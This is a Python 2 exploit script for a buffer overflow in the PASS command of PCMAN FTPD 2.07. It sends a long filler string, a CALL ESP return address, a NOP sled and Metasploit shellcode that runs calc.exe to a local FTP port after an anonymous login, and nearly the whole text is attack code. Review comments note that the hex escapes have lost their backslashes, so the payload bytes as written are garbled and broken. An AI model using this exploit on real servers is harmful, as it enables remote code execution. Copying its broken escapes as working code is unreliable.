# Title : PCMAN FTP 2.07 PASS Command - Buffer Overflow
# Published : 2013-08-02
# Author :
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
"""
PCMAN FTPD 2.07 PASS Command Buffer Overflow
Author: Ottomatik
Date: 2013-07-31
Software : PCMAN FTPD
Version : 2.07
Tested On: Windows 7 SP1 - French;
Description:
* The PASS Command is vulnerable to a buffer overflow;
* Other commands may be vulnerable;
"""
# Modules import;
import socket
def main() :
    """
    Main function;

    Builds an oversized argument for the FTP PASS command (the condition the
    module docstring describes) and sends it to an FTP service on
    127.0.0.1:21 after an anonymous USER login, printing each server reply.
    Written for Python 2 (print statements, str buffers), matching the
    python2.7 shebang at the top of the file.
    """
    buf = "PASS "
    # ~6 KiB of filler: the oversized PASS argument is the trigger condition
    # described in the module docstring and the obvious thing a protocol
    # monitor or length check on FTP commands would flag.
    buf += "A" * 6102 # JUNK
    # 0x75670253
    buf += "x53x02x67x75" # @ CALL ESP Kernel32.dll
    # NOTE(review): throughout this file the "x.." sequences read as hex
    # escapes whose backslashes were lost (probably during extraction); as
    # written they are literal ASCII text, so buf is not the byte sequence
    # the author's comments describe.
    buf += "x90" * 40 # NOPs
    # ShellCode : msfpayload windows_exec calc.exe, bad chars = 00,0A,0C,0D
    buf +=("xddxc5xd9x74x24xf4x5ax31xc9xb8xd1x96xc1xcbxb1"
    "x33x31x42x17x83xc2x04x03x93x85x23x3exefx42x2a"
    "xc1x0fx93x4dx4bxeaxa2x5fx2fx7fx96x6fx3bx2dx1b"
    "x1bx69xc5xa8x69xa6xeax19xc7x90xc5x9axe9x1cx89"
    "x59x6bxe1xd3x8dx4bxd8x1cxc0x8ax1dx40x2bxdexf6"
    "x0fx9excfx73x4dx23xf1x53xdax1bx89xd6x1cxefx23"
    "xd8x4cx40x3fx92x74xeax67x03x85x3fx74x7fxccx34"
    "x4fx0bxcfx9cx81xf4xfexe0x4excbxcfxecx8fx0bxf7"
    "x0exfax67x04xb2xfdxb3x77x68x8bx21xdfxfbx2bx82"
    "xdex28xadx41xecx85xb9x0exf0x18x6dx25x0cx90x90"
    "xeax85xe2xb6x2excexb1xd7x77xaax14xe7x68x12xc8"
    "x4dxe2xb0x1dxf7xa9xdexe0x75xd4xa7xe3x85xd7x87"
    "x8bxb4x5cx48xcbx48xb7x2dx23x03x9ax07xacxcax4e"
    "x1axb1xecxa4x58xccx6ex4dx20x2bx6ex24x25x77x28"
    "xd4x57xe8xddxdaxc4x09xf4xb8x8bx99x94x10x2ex1a"
    "x3ex6d")
    # Intended as the FTP line terminator (CRLF); see the escape note above.
    buf += "rn"
    # Target is hard-coded to the local loopback FTP port.
    clt_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    clt_socket.connect(("127.0.0.1", 21))
    # Print the server banner.
    print clt_socket.recv(2048)
    # Anonymous USER login precedes the PASS command per the FTP exchange.
    clt_socket.send("USER anonymousrn")
    print clt_socket.recv(2048)
    clt_socket.send(buf)
    # A reply is read once more; the script does not check for a closed or
    # unresponsive connection, which a crashed service would produce.
    print clt_socket.recv(2048)
    clt_socket.close()
# Script entry point: run main() only when executed directly, not on import.
if __name__ == "__main__" :
    main()